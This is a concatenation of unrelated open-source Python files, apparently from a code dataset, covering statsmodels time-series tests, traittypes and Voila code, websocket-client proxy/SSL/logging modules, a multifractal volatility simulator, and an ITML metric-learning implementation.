with pytest.raises(ValueError):
innovations_filter(np.empty(4), theta[:-1])
with pytest.raises(ValueError):
innovations_filter(pd.DataFrame(np.empty((1, 4))), theta)
def test_innovations_algo_filter_kalman_filter(reset_randomstate):
# Test the innovations algorithm and filter against the Kalman filter
# for exact likelihood evaluation of an ARMA process
ar_params = np.array([0.5])
ma_params = np.array([0.2])
# TODO could generalize to sigma2 != 1, if desired, after #5324 is merged
# and there is a sigma2 argument to arma_acovf
# (but maybe this is not really necessary for the point of this test)
sigma2 = 1
endog = np.random.normal(size=10)
# Innovations algorithm approach
acovf = arma_acovf(
np.r_[1, -ar_params], np.r_[1, ma_params], nobs=len(endog)
)
theta, v = innovations_algo(acovf)
u = innovations_filter(endog, theta)
llf_obs = -0.5 * u ** 2 / (sigma2 * v) - 0.5 * np.log(2 * np.pi * v)
# Kalman filter apparoach
mod = SARIMAX(endog, order=(len(ar_params), 0, len(ma_params)))
res = mod.filter(np.r_[ar_params, ma_params, sigma2])
# Test that the two approaches are identical
atol = 1e-6 if PLATFORM_WIN else 0.0
assert_allclose(u, res.forecasts_error[0], rtol=1e-6, atol=atol)
assert_allclose(
theta[1:, 0], res.filter_results.kalman_gain[0, 0, :-1], atol=atol
)
assert_allclose(llf_obs, res.llf_obs, atol=atol)
def test_adfuller_short_series(reset_randomstate):
y = np.random.standard_normal(7)
res = adfuller(y, store=True)
assert res[-1].maxlag == 1
y = np.random.standard_normal(2)
with pytest.raises(ValueError, match="sample size is too short"):
adfuller(y)
y = np.random.standard_normal(3)
with pytest.raises(ValueError, match="sample size is too short"):
adfuller(y, regression="ct")
def test_adfuller_maxlag_too_large(reset_randomstate):
y = np.random.standard_normal(100)
with pytest.raises(ValueError, match="maxlag must be less than"):
adfuller(y, maxlag=51)
class SetupZivotAndrews(object):
# test directory
cur_dir = CURR_DIR
run_dir = os.path.join(cur_dir, "results")
# use same file for testing failure modes
fail_file = os.path.join(run_dir, "rgnp.csv")
fail_mdl = np.asarray(pd.read_csv(fail_file))
class TestZivotAndrews(SetupZivotAndrews):
# failure mode tests
def test_fail_regression_type(self):
with pytest.raises(ValueError):
zivot_andrews(self.fail_mdl, regression="x")
def test_fail_trim_value(self):
with pytest.raises(ValueError):
zivot_andrews(self.fail_mdl, trim=0.5)
def test_fail_array_shape(self):
with pytest.raises(ValueError):
zivot_andrews(np.random.rand(50, 2))
def test_fail_autolag_type(self):
with pytest.raises(ValueError):
zivot_andrews(self.fail_mdl, autolag="None")
@pytest.mark.parametrize("autolag", ["AIC", "aic", "Aic"])
def test_autolag_case_sensitivity(self, autolag):
res = zivot_andrews(self.fail_mdl, autolag=autolag)
assert res[3] == 1
# following tests compare results to R package urca.ur.za (1.13-0)
def test_rgnp_case(self):
res = zivot_andrews(
self.fail_mdl, maxlag=8, regression="c", autolag=None
)
assert_allclose(
[res[0], res[1], res[4]], [-5.57615, 0.00312, 20], rtol=1e-3
)
def test_gnpdef_case(self):
mdlfile = os.path.join(self.run_dir, "gnpdef.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, maxlag=8, regression="c", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-4.12155, 0.28024, 5, 40],
rtol=1e-3,
)
def test_stkprc_case(self):
mdlfile = os.path.join(self.run_dir, "stkprc.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, maxlag=8, regression="ct", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-5.60689, 0.00894, 1, 65],
rtol=1e-3,
)
def test_rgnpq_case(self):
mdlfile = os.path.join(self.run_dir, "rgnpq.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, maxlag=12, regression="t", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-3.02761, 0.63993, 12, 102],
rtol=1e-3,
)
def test_rand10000_case(self):
mdlfile = os.path.join(self.run_dir, "rand10000.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, regression="c", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-3.48223, 0.69111, 25, 7071],
rtol=1e-3,
)
def test_acf_conservate_nanops(reset_randomstate):
# GH 6729
e = np.random.standard_normal(100)
for i in range(1, e.shape[0]):
e[i] += 0.9 * e[i - 1]
e[::7] = np.nan
result = acf(e, missing="conservative", nlags=10, fft=False)
resid = e - np.nanmean(e)
expected = np.ones(11)
nobs = e.shape[0]
gamma0 = np.nansum(resid * resid)
for i in range(1, 10 + 1):
expected[i] = np.nansum(resid[i:] * resid[: nobs - i]) / gamma0
assert_allclose(result, expected, rtol=1e-4, atol=1e-4)
def test_pacf_nlags_error(reset_randomstate):
e = np.random.standard_normal(100)
with pytest.raises(ValueError, match="Can only compute partial"):
pacf(e, 50)
def test_coint_auto_tstat():
rs = np.random.RandomState(3733696641)
x = np.cumsum(rs.standard_normal(100))
y = np.cumsum(rs.standard_normal(100))
res = coint(
x,
y,
trend="c",
method="aeg",
maxlag=0,
autolag="t-stat",
return_results=False,
)
assert np.abs(res[0]) < 1.65
rs = np.random.RandomState(1)
a = rs.random_sample(120)
b = np.zeros_like(a)
df1 = pd.DataFrame({"b": b, "a": a})
df2 = pd.DataFrame({"a": a, "b": b})
b = np.ones_like(a)
df3 = pd.DataFrame({"b": b, "a": a})
df4 = pd.DataFrame({"a": a, "b": b})
gc_data_sets = [df1, df2, df3, df4]
@pytest.mark.parametrize("dataset", gc_data_sets)
def test_granger_causality_exceptions(dataset):
with pytest.raises(InfeasibleTestError):
grangercausalitytests(dataset, 4)
```
#### File: traittypes/tests/test_import_errors.py
```python
import nose.tools as nt
from ..traittypes import _DelayedImportError
@nt.raises(RuntimeError)
def test_delayed_access_raises():
dummy = _DelayedImportError('mypackage')
dummy.asarray([1, 2, 3])
```
#### File: traittypes/tests/test_traittypes.py
```python
from unittest import TestCase
from traitlets import HasTraits, TraitError, observe, Undefined
from traitlets.tests.test_traitlets import TraitTestBase
from traittypes import Array, DataFrame, Series, Dataset, DataArray
import numpy as np
import pandas as pd
import xarray as xr
# Good / Bad value trait test cases
class IntArrayTrait(HasTraits):
value = Array().tag(dtype=np.int)
class TestIntArray(TraitTestBase):
"""
Test dtype validation with a ``dtype=np.int``
"""
obj = IntArrayTrait()
_good_values = [1, [1, 2, 3], [[1, 2, 3], [4, 5, 6]], np.array([1])]
_bad_values = [[1, [0, 0]]]
def assertEqual(self, v1, v2):
return np.testing.assert_array_equal(v1, v2)
# Other test cases
class TestArray(TestCase):
def test_array_equal(self):
notifications = []
class Foo(HasTraits):
bar = Array([1, 2])
@observe('bar')
def _(self, change):
notifications.append(change)
foo = Foo()
foo.bar = [1, 2]
self.assertFalse(len(notifications))
foo.bar = [1, 1]
self.assertTrue(len(notifications))
def test_initial_values(self):
class Foo(HasTraits):
a = Array()
b = Array(dtype='int')
c = Array(None, allow_none=True)
d = Array([])
e = Array(Undefined)
foo = Foo()
self.assertTrue(np.array_equal(foo.a, np.array(0)))
self.assertTrue(np.array_equal(foo.b, np.array(0)))
self.assertTrue(foo.c is None)
self.assertTrue(np.array_equal(foo.d, []))
self.assertTrue(foo.e is Undefined)
def test_allow_none(self):
class Foo(HasTraits):
bar = Array()
baz = Array(allow_none=True)
foo = Foo()
with self.assertRaises(TraitError):
foo.bar = None
foo.baz = None
def test_custom_validators(self):
# Test with a squeeze coercion
def squeeze(trait, value):
if 1 in value.shape:
value = np.squeeze(value)
return value
class Foo(HasTraits):
bar = Array().valid(squeeze)
foo = Foo(bar=[[1], [2]])
self.assertTrue(np.array_equal(foo.bar, [1, 2]))
foo.bar = [[1], [2], [3]]
self.assertTrue(np.array_equal(foo.bar, [1, 2, 3]))
# Test with a shape constraint
def shape(*dimensions):
def validator(trait, value):
if value.shape != dimensions:
raise TraitError('Expected an of shape %s and got and array with shape %s' % (dimensions, value.shape))
else:
return value
return validator
class Foo(HasTraits):
bar = Array(np.identity(2)).valid(shape(2, 2))
foo = Foo()
with self.assertRaises(TraitError):
foo.bar = [1]
new_value = [[0, 1], [1, 0]]
foo.bar = new_value
self.assertTrue(np.array_equal(foo.bar, new_value))
class TestDataFrame(TestCase):
def test_df_equal(self):
notifications = []
class Foo(HasTraits):
bar = DataFrame([1, 2])
@observe('bar')
def _(self, change):
notifications.append(change)
foo = Foo()
foo.bar = [1, 2]
self.assertEqual(notifications, [])
foo.bar = [1, 1]
self.assertEqual(len(notifications), 1)
def test_initial_values(self):
class Foo(HasTraits):
a = DataFrame()
b = DataFrame(None, allow_none=True)
c = DataFrame([])
d = DataFrame(Undefined)
foo = Foo()
self.assertTrue(foo.a.equals(pd.DataFrame()))
self.assertTrue(foo.b is None)
self.assertTrue(foo.c.equals(pd.DataFrame([])))
self.assertTrue(foo.d is Undefined)
def test_allow_none(self):
class Foo(HasTraits):
bar = DataFrame()
baz = DataFrame(allow_none=True)
foo = Foo()
with self.assertRaises(TraitError):
foo.bar = None
foo.baz = None
class TestSeries(TestCase):
def test_series_equal(self):
notifications = []
class Foo(HasTraits):
bar = Series([1, 2])
@observe('bar')
def _(self, change):
notifications.append(change)
foo = Foo()
foo.bar = [1, 2]
self.assertEqual(notifications, [])
foo.bar = [1, 1]
self.assertEqual(len(notifications), 1)
def test_initial_values(self):
class Foo(HasTraits):
a = Series()
b = Series(None, allow_none=True)
c = Series([])
d = Series(Undefined)
foo = Foo()
self.assertTrue(foo.a.equals(pd.Series()))
self.assertTrue(foo.b is None)
self.assertTrue(foo.c.equals(pd.Series([])))
self.assertTrue(foo.d is Undefined)
def test_allow_none(self):
class Foo(HasTraits):
bar = Series()
baz = Series(allow_none=True)
foo = Foo()
with self.assertRaises(TraitError):
foo.bar = None
foo.baz = None
class TestDataset(TestCase):
def test_ds_equal(self):
notifications = []
class Foo(HasTraits):
bar = Dataset({'foo': xr.DataArray([[0, 1, 2], [3, 4, 5]], coords={'x': ['a', 'b']}, dims=('x', 'y')), 'bar': ('x', [1, 2]), 'baz': 3.14})
@observe('bar')
def _(self, change):
notifications.append(change)
foo = Foo()
foo.bar = {'foo': xr.DataArray([[0, 1, 2], [3, 4, 5]], coords={'x': ['a', 'b']}, dims=('x', 'y')), 'bar': ('x', [1, 2]), 'baz': 3.14}
self.assertEqual(notifications, [])
foo.bar = {'foo': xr.DataArray([[0, 1, 2], [3, 4, 5]], coords={'x': ['a', 'b']}, dims=('x', 'y')), 'bar': ('x', [1, 2]), 'baz': 3.15}
self.assertEqual(len(notifications), 1)
def test_initial_values(self):
class Foo(HasTraits):
a = Dataset()
b = Dataset(None, allow_none=True)
d = Dataset(Undefined)
foo = Foo()
self.assertTrue(foo.a.equals(xr.Dataset()))
self.assertTrue(foo.b is None)
self.assertTrue(foo.d is Undefined)
def test_allow_none(self):
class Foo(HasTraits):
bar = Dataset()
baz = Dataset(allow_none=True)
foo = Foo()
with self.assertRaises(TraitError):
foo.bar = None
foo.baz = None
class TestDataArray(TestCase):
def test_ds_equal(self):
notifications = []
class Foo(HasTraits):
bar = DataArray([[0, 1], [2, 3]])
@observe('bar')
def _(self, change):
notifications.append(change)
foo = Foo()
foo.bar = [[0, 1], [2, 3]]
self.assertEqual(notifications, [])
foo.bar = [[0, 1], [2, 4]]
self.assertEqual(len(notifications), 1)
def test_initial_values(self):
class Foo(HasTraits):
b = DataArray(None, allow_none=True)
c = DataArray([])
d = DataArray(Undefined)
foo = Foo()
self.assertTrue(foo.b is None)
self.assertTrue(foo.c.equals(xr.DataArray([])))
self.assertTrue(foo.d is Undefined)
```
#### File: site-packages/voila/query_parameters_handler.py
```python
from tornado.websocket import WebSocketHandler
import logging
from typing import Dict
class QueryStringSocketHandler(WebSocketHandler):
"""A websocket handler used to provide the query string
assocciated with kernel ids in preheat kernel mode.
Class variables
---------------
- _waiters : A dictionary which holds the `websocket` connection
assocciated with the kernel id.
- cache : A dictionary which holds the query string assocciated
with the kernel id.
"""
_waiters = dict()
_cache = dict()
def open(self, kernel_id: str) -> None:
"""Create a new websocket connection, this connection is
identified by the kernel id.
Args:
kernel_id (str): Kernel id used by the notebook when it opens
the websocket connection.
"""
QueryStringSocketHandler._waiters[kernel_id] = self
if kernel_id in self._cache:
self.write_message(self._cache[kernel_id])
def on_close(self) -> None:
for k_id, waiter in QueryStringSocketHandler._waiters.items():
if waiter == self:
break
del QueryStringSocketHandler._waiters[k_id]
@classmethod
def send_updates(cls: 'QueryStringSocketHandler', msg: Dict) -> None:
"""Class method used to dispath the query string to the waiting
notebook. This method is called in `VoilaHandler` when the query
string becomes available.
If this method is called before the opening of websocket connection,
`msg` is stored in `_cache0` and the message will be dispatched when
a notebook with coresponding kernel id is connected.
Args:
- msg (Dict): this dictionary contains the `kernel_id` to identify
the waiting notebook and `payload` is the query string.
"""
kernel_id = msg['kernel_id']
payload = msg['payload']
waiter = cls._waiters.get(kernel_id, None)
if waiter is not None:
try:
waiter.write_message(payload)
except Exception:
logging.error("Error sending message", exc_info=True)
cls._cache[kernel_id] = payload
```
#### File: site-packages/websocket/_http.py
```python
import errno
import os
import socket
import sys
from ._exceptions import *
from ._logging import *
from ._socket import*
from ._ssl_compat import *
from ._url import *
from base64 import encodebytes as base64encode
__all__ = ["proxy_info", "connect", "read_headers"]
try:
from python_socks.sync import Proxy
from python_socks._errors import *
from python_socks._types import ProxyType
HAVE_PYTHON_SOCKS = True
except:
HAVE_PYTHON_SOCKS = False
class ProxyError(Exception):
pass
class ProxyTimeoutError(Exception):
pass
class ProxyConnectionError(Exception):
pass
class proxy_info:
def __init__(self, **options):
self.proxy_host = options.get("http_proxy_host", None)
if self.proxy_host:
self.proxy_port = options.get("http_proxy_port", 0)
self.auth = options.get("http_proxy_auth", None)
self.no_proxy = options.get("http_no_proxy", None)
self.proxy_protocol = options.get("proxy_type", "http")
# Note: If timeout not specified, default python-socks timeout is 60 seconds
self.proxy_timeout = options.get("timeout", None)
if self.proxy_protocol not in ['http', 'socks4', 'socks4a', 'socks5', 'socks5h']:
raise ProxyError("Only http, socks4, socks5 proxy protocols are supported")
else:
self.proxy_port = 0
self.auth = None
self.no_proxy = None
self.proxy_protocol = "http"
def _start_proxied_socket(url, options, proxy):
if not HAVE_PYTHON_SOCKS:
raise WebSocketException("Python Socks is needed for SOCKS proxying but is not available")
hostname, port, resource, is_secure = parse_url(url)
if proxy.proxy_protocol == "socks5":
rdns = False
proxy_type = ProxyType.SOCKS5
if proxy.proxy_protocol == "socks4":
rdns = False
proxy_type = ProxyType.SOCKS4
# socks5h and socks4a send DNS through proxy
if proxy.proxy_protocol == "socks5h":
rdns = True
proxy_type = ProxyType.SOCKS5
if proxy.proxy_protocol == "socks4a":
rdns = True
proxy_type = ProxyType.SOCKS4
ws_proxy = Proxy.create(
proxy_type=proxy_type,
host=proxy.proxy_host,
port=int(proxy.proxy_port),
username=proxy.auth[0] if proxy.auth else None,
password=<PASSWORD>] if proxy.auth else None,
rdns=rdns)
sock = ws_proxy.connect(hostname, port, timeout=proxy.proxy_timeout)
if is_secure and HAVE_SSL:
sock = _ssl_socket(sock, options.sslopt, hostname)
elif is_secure:
raise WebSocketException("SSL not available.")
return sock, (hostname, port, resource)
def connect(url, options, proxy, socket):
# Use _start_proxied_socket() only for socks4 or socks5 proxy
# Use _tunnel() for http proxy
# TODO: Use python-socks for http protocol also, to standardize flow
if proxy.proxy_host and not socket and not (proxy.proxy_protocol == "http"):
return _start_proxied_socket(url, options, proxy)
hostname, port, resource, is_secure = parse_url(url)
if socket:
return socket, (hostname, port, resource)
addrinfo_list, need_tunnel, auth = _get_addrinfo_list(
hostname, port, is_secure, proxy)
if not addrinfo_list:
raise WebSocketException(
"Host not found.: " + hostname + ":" + str(port))
sock = None
try:
sock = _open_socket(addrinfo_list, options.sockopt, options.timeout)
if need_tunnel:
sock = _tunnel(sock, hostname, port, auth)
if is_secure:
if HAVE_SSL:
sock = _ssl_socket(sock, options.sslopt, hostname)
else:
raise WebSocketException("SSL not available.")
return sock, (hostname, port, resource)
except:
if sock:
sock.close()
raise
def _get_addrinfo_list(hostname, port, is_secure, proxy):
phost, pport, pauth = get_proxy_info(
hostname, is_secure, proxy.proxy_host, proxy.proxy_port, proxy.auth, proxy.no_proxy)
try:
# when running on windows 10, getaddrinfo without socktype returns a socktype 0.
# This generates an error exception: `_on_error: exception Socket type must be stream or datagram, not 0`
# or `OSError: [Errno 22] Invalid argument` when creating socket. Force the socket type to SOCK_STREAM.
if not phost:
addrinfo_list = socket.getaddrinfo(
hostname, port, 0, socket.SOCK_STREAM, socket.SOL_TCP)
return addrinfo_list, False, None
else:
pport = pport and pport or 80
# when running on windows 10, the getaddrinfo used above
# returns a socktype 0. This generates an error exception:
# _on_error: exception Socket type must be stream or datagram, not 0
# Force the socket type to SOCK_STREAM
addrinfo_list = socket.getaddrinfo(phost, pport, 0, socket.SOCK_STREAM, socket.SOL_TCP)
return addrinfo_list, True, pauth
except socket.gaierror as e:
raise WebSocketAddressException(e)
def _open_socket(addrinfo_list, sockopt, timeout):
err = None
for addrinfo in addrinfo_list:
family, socktype, proto = addrinfo[:3]
sock = socket.socket(family, socktype, proto)
sock.settimeout(timeout)
for opts in DEFAULT_SOCKET_OPTION:
sock.setsockopt(*opts)
for opts in sockopt:
sock.setsockopt(*opts)
address = addrinfo[4]
err = None
while not err:
try:
sock.connect(address)
except socket.error as error:
error.remote_ip = str(address[0])
try:
eConnRefused = (errno.ECONNREFUSED, errno.WSAECONNREFUSED)
except:
eConnRefused = (errno.ECONNREFUSED, )
if error.errno == errno.EINTR:
continue
elif error.errno in eConnRefused:
err = error
continue
else:
if sock:
sock.close()
raise error
else:
break
else:
continue
break
else:
if err:
raise err
return sock
def _wrap_sni_socket(sock, sslopt, hostname, check_hostname):
context = sslopt.get('context', None)
if not context:
context = ssl.SSLContext(sslopt.get('ssl_version', ssl.PROTOCOL_TLS_CLIENT))
if sslopt.get('cert_reqs', ssl.CERT_NONE) != ssl.CERT_NONE:
cafile = sslopt.get('ca_certs', None)
capath = sslopt.get('ca_cert_path', None)
if cafile or capath:
context.load_verify_locations(cafile=cafile, capath=capath)
elif hasattr(context, 'load_default_certs'):
context.load_default_certs(ssl.Purpose.SERVER_AUTH)
if sslopt.get('certfile', None):
context.load_cert_chain(
sslopt['certfile'],
sslopt.get('keyfile', None),
sslopt.get('password', None),
)
# Python 3.10 switch to PROTOCOL_TLS_CLIENT defaults to "cert_reqs = ssl.CERT_REQUIRED" and "check_hostname = True"
# If both disabled, set check_hostname before verify_mode
# see https://github.com/liris/websocket-client/commit/b96a2e8fa765753e82eea531adb19716b52ca3ca#commitcomment-10803153
if sslopt.get('cert_reqs', ssl.CERT_NONE) == ssl.CERT_NONE and not sslopt.get('check_hostname', False):
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
else:
context.check_hostname = sslopt.get('check_hostname', True)
context.verify_mode = sslopt.get('cert_reqs', ssl.CERT_REQUIRED)
if 'ciphers' in sslopt:
context.set_ciphers(sslopt['ciphers'])
if 'cert_chain' in sslopt:
certfile, keyfile, password = sslopt['cert_chain']
context.load_cert_chain(certfile, keyfile, password)
if 'ecdh_curve' in sslopt:
context.set_ecdh_curve(sslopt['ecdh_curve'])
return context.wrap_socket(
sock,
do_handshake_on_connect=sslopt.get('do_handshake_on_connect', True),
suppress_ragged_eofs=sslopt.get('suppress_ragged_eofs', True),
server_hostname=hostname,
)
def _ssl_socket(sock, user_sslopt, hostname):
sslopt = dict(cert_reqs=ssl.CERT_REQUIRED)
sslopt.update(user_sslopt)
certPath = os.environ.get('WEBSOCKET_CLIENT_CA_BUNDLE')
if certPath and os.path.isfile(certPath) \
and user_sslopt.get('ca_certs', None) is None:
sslopt['ca_certs'] = certPath
elif certPath and os.path.isdir(certPath) \
and user_sslopt.get('ca_cert_path', None) is None:
sslopt['ca_cert_path'] = certPath
if sslopt.get('server_hostname', None):
hostname = sslopt['server_hostname']
check_hostname = sslopt.get('check_hostname', True)
sock = _wrap_sni_socket(sock, sslopt, hostname, check_hostname)
return sock
def _tunnel(sock, host, port, auth):
debug("Connecting proxy...")
connect_header = "CONNECT %s:%d HTTP/1.1\r\n" % (host, port)
connect_header += "Host: %s:%d\r\n" % (host, port)
# TODO: support digest auth.
if auth and auth[0]:
auth_str = auth[0]
if auth[1]:
auth_str += ":" + auth[1]
encoded_str = base64encode(auth_str.encode()).strip().decode().replace('\n', '')
connect_header += "Proxy-Authorization: Basic %s\r\n" % encoded_str
connect_header += "\r\n"
dump("request header", connect_header)
send(sock, connect_header)
try:
status, resp_headers, status_message = read_headers(sock)
except Exception as e:
raise WebSocketProxyException(str(e))
if status != 200:
raise WebSocketProxyException(
"failed CONNECT via proxy status: %r" % status)
return sock
def read_headers(sock):
status = None
status_message = None
headers = {}
trace("--- response header ---")
while True:
line = recv_line(sock)
line = line.decode('utf-8').strip()
if not line:
break
trace(line)
if not status:
status_info = line.split(" ", 2)
status = int(status_info[1])
if len(status_info) > 2:
status_message = status_info[2]
else:
kv = line.split(":", 1)
if len(kv) == 2:
key, value = kv
if key.lower() == "set-cookie" and headers.get("set-cookie"):
headers["set-cookie"] = headers.get("set-cookie") + "; " + value.strip()
else:
headers[key.lower()] = value.strip()
else:
raise WebSocketException("Invalid header")
trace("-----------------------")
return status, headers, status_message
```
#### File: site-packages/websocket/_logging.py
```python
import logging
_logger = logging.getLogger('websocket')
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
_logger.addHandler(NullHandler())
_traceEnabled = False
__all__ = ["enableTrace", "dump", "error", "warning", "debug", "trace",
"isEnabledForError", "isEnabledForDebug", "isEnabledForTrace"]
def enableTrace(traceable, handler=logging.StreamHandler()):
"""
Turn on/off the traceability.
Parameters
----------
traceable: bool
If set to True, traceability is enabled.
"""
global _traceEnabled
_traceEnabled = traceable
if traceable:
_logger.addHandler(handler)
_logger.setLevel(logging.DEBUG)
def dump(title, message):
if _traceEnabled:
_logger.debug("--- " + title + " ---")
_logger.debug(message)
_logger.debug("-----------------------")
def error(msg):
_logger.error(msg)
def warning(msg):
_logger.warning(msg)
def debug(msg):
_logger.debug(msg)
def trace(msg):
if _traceEnabled:
_logger.debug(msg)
def isEnabledForError():
return _logger.isEnabledFor(logging.ERROR)
def isEnabledForDebug():
return _logger.isEnabledFor(logging.DEBUG)
def isEnabledForTrace():
return _traceEnabled
``` |
{
"source": "johncollinsedhec/markov-switching-multifractal",
"score": 2
} |
#### File: johncollinsedhec/markov-switching-multifractal/simulatedata.py
```python
import numpy as np
def simulatedata(b,m0,gamma_kbar,sig,kbar,T):
m0 = m0
m1 = 2-m0
g_s = np.zeros(kbar)
M_s = np.zeros((kbar,T))
g_s[0] = 1-(1-gamma_kbar)**(1/(b**(kbar-1)))
for i in range(1,kbar):
g_s[i] = 1-(1-g_s[0])**(b**(i))
for j in range(kbar):
M_s[j,:] = np.random.binomial(1,g_s[j],T)
dat = np.zeros(T)
tmp = (M_s[:,0]==1)*m1+(M_s[:,0]==0)*m0
dat[0] = np.prod(tmp)
for k in range(1,T):
for j in range(kbar):
if M_s[j,k]==1:
tmp[j] = np.random.choice([m0,m1],1,p = [0.5,0.5])
dat[k] = np.prod(tmp)
dat = np.sqrt(dat)*sig* np.random.normal(size = T) # VOL TIME SCALING
dat = dat.reshape(-1,1)
return(dat)
``` |
{
"source": "johncollins/metric-learn",
"score": 3
} |
#### File: metric_learn/itml/ItmlAlgorithm.py
```python
from ..MetricLearningAlgorithm import MetricLearningAlgorithm
from numba.decorators import jit, autojit
from numba import double
from utils import compute_distance_extremes, get_constraints
import numba
import numpy as np
class ItmlAlgorithm(MetricLearningAlgorithm):
"""
Implementation of Information Theoretic Metric Learning
Kulis et. al
#TODO: Add more reference materials
"""
def set_default_parameters(self):
self.parameters = {
'gamma' : 1.0,
'beta' : 1.0,
'constant_factor' : 40.0,
'type4_rank' : 5.0,
'thresh' : 10e-5,
'k' : 4,
'max_iters' : 100000,
'lower_percentile': 5,
'upper_percentile': 95,
'A0': np.eye(self.X.shape[1]),
'verbose': True
}
def run_algorithm_specific_setup(self):
self.l, self.u = compute_distance_extremes(self.X, self.parameters['lower_percentile'],
self.parameters['upper_percentile'], np.eye(self.X.shape[1]))
num_constraints = int(self.parameters['constant_factor'] * (max(self.y.shape) * (max(self.y.shape))-1))
self.constraints = get_constraints(self.y, num_constraints, self.l, self.u)
# check to make sure that no pair of constrained vectors
# are identical. If they are, remove the constraint
#TODO: Clean this up and make it pythonic
#invalid = []
#for i, c in enumerate(C):
# i1, i2 = C[i, :2]
# v = X[i1, :] - X[i2, :]
# if np.linalg.norm(v) < 10e-10:
# invalid.append(i)
#C = np.delete(C, invalid, 0)
#print self.constraints
valid = np.array([np.linalg.norm(self.X[c[0],:] - self.X[c[1],:]) > 10e-10 for c in self.constraints])
#print valid
self.constraints = self.constraints[valid,:]
self.A0 = self.parameters['A0']
def learn_metric(self):
tol, gamma, max_iters = self.parameters['thresh'], self.parameters['gamma'], self.parameters['max_iters']
C = self.constraints
X, y = self.X, self.y
i = 0
iteration = 0
c = C.shape[0]
lambdacurrent = np.zeros((c))
bhat = np.array(C[:,3])
lambdaold = np.array(lambdacurrent)
converged = np.inf
A = np.matrix(self.A0)
verbose = self.parameters['verbose']
while True:
V = np.asmatrix(X[C[i, 0], :] - X[C[i, 1], :]).T # column vector x - y
wtw = (V.T * A * V)[0, 0] # a scalar
if np.abs(bhat[i]) < 10e-10:
print('bhat should never be 0!')
exit()
if gamma == np.inf:
gamma_proj = 1
else:
gamma_proj = gamma / (gamma + 1)
if C[i, 2] == 1: # lower bound constraint
alpha = min(lambdacurrent[i], gamma_proj * (1.0 / (wtw) - 1.0 / bhat[i]))
lambdacurrent[i] = lambdacurrent[i] - alpha
beta = alpha / (1 - alpha * wtw)
bhat[i] = 1.0 / ((1.0 / bhat[i]) + (alpha / gamma))
elif C[i, 2] == -1: # upper bound constraint
alpha = min(lambdacurrent[i], gamma_proj * (1.0 / bhat[i] - 1.0 / wtw))
lambdacurrent[i] = lambdacurrent[i] - alpha
beta = -1 * alpha / (1 + alpha * wtw)
bhat[i] = 1.0 / ((1.0 / bhat[i]) - (alpha / gamma))
A += beta * A * (V * V.T) * A # non-numba version
# A = update(A, V, beta) # numba version not working
if i == c - 1:
normsum = np.linalg.norm(lambdacurrent) + np.linalg.norm(lambdaold)
if normsum == 0:
break
else:
converged = np.linalg.norm(lambdaold - lambdacurrent, ord = 1) / normsum
if (converged < tol) or (iteration > max_iters):
break
lambdaold = np.array(lambdacurrent)
i = ((i+1) % c)
iteration += 1
if iteration % 5000 == 0 and verbose:
print('itml iter: %d, converged = %f' % (iteration, converged))
if verbose:
print('itml converged to tol: %f, iteration: %d' % (converged, iteration))
return np.asarray(A)
"""
@autojit
def update(A, V, beta):
return A + beta * A * (V * V.T) * A
@jit(argtypes=(double[:,:],double[:,:],double))
def update2(A, V, beta):
return A + beta * A * (V * V.T) * A
"""
```
#### File: itml/test/test_utils.py
```python
from ..utils import compute_distance_extremes, get_constraints
import numpy as np
import random
from nose.tools import assert_equal
class TestUtils(object):
def __init__(self):
random.seed(0)
self.X = np.array([[1, 10, 1], [3, 6, 7], [9, 11, 1], [1, 2, 1]])
self.lower, self.upper = 20, 80
self.M = np.eye(self.X.shape[1])
def test_compute_distance_extremes(self):
self.l, self.u = compute_distance_extremes(self.X, self.lower, self.upper, self.M)
assert_equal(self.l, 28.275)
assert_equal(self.u, 115.275)
```
#### File: metric_learn/itml/utils.py
```python
def compute_distance_extremes(X, a, b, M):
"""
Usage:
from compute_distance_extremes import compute_distance_extremes
(l, u) = compute_distance_extremes(X, a, b, M)
Computes sample histogram of the distances between rows of X and returns
the value of these distances at the a^th and b^th percentils. This
method is used to determine the upper and lower bounds for
similarity / dissimilarity constraints.
Args:
X: (n x m) data matrix
a: lower bound percentile between 1 and 100
b: upper bound percentile between 1 and 100
M: Mahalanobis matrix to compute distances
Returns:
l: distance corresponding to a^th percentile
u: distance corresponding the b^th percentile
"""
import numpy as np
import random
random.seed(0)
if (a < 1) or (a > 100):
raise Exception('a must be between 1 and 100')
if (b < 1) or (b > 100):
raise Exception('b must be between 1 and 100')
n = X.shape[0]
num_trials = min(100, n * (n - 1) / 2);
# sample with replacement
dists = np.zeros((num_trials, 1))
for i in xrange(num_trials):
j1 = np.floor(random.uniform(0, n))
j2 = np.floor(random.uniform(0, n))
dists[i] = np.dot(np.dot((X[j1, :] - X[j2, :]), M), (X[j1, :] - X[j2, :]).T)
# return frequencies and bin extremeties
(f, ext) = np.histogram(dists, bins = 100) # specify bins by percentile
# get bin centers
c = [(ext[i]+float(ext[i+1])) / 2 for i in xrange(len(ext) - 1)]
# get values at percentiles
l = c[int(np.floor(a)) - 1] # get counts for lower percentile
u = c[int(np.floor(b)) - 1] # get counts for higher percentile
return l, u
def get_constraints(y, num_constraints, l, u):
"""
get_constraints(y, num_constraints, l, u)
Get ITML constraint matrix from true labels.
"""
import numpy as np
import random
random.seed(0)
# Make quartets for pairs of indices [index1, index2, 1 or -1, l or u]
# Note that l always goes with 1 and u always goes with -1
m = len(y)
C = np.zeros((num_constraints, 4))
for k in xrange(num_constraints):
i = np.floor(random.uniform(0, m))
j = np.floor(random.uniform(0, m))
if y[i] == y[j]:
C[k, :] = (i, j, 1, l)
else:
C[k, :] = (i, j, -1, u)
return np.array(C)
```
#### File: metric_learn/test/test_MetricLearningAlgorithm.py
```python
import scipy.linalg
from ..MetricLearningAlgorithm import MetricLearningAlgorithm
from nose.tools import assert_raises, assert_equal
import numpy as np
class TestMetricLearningAlgorithm(object):
def __init__(self):
self.X = np.array([[1, 2, 3], [4, 5, 6]])
self.y = [1, 2]
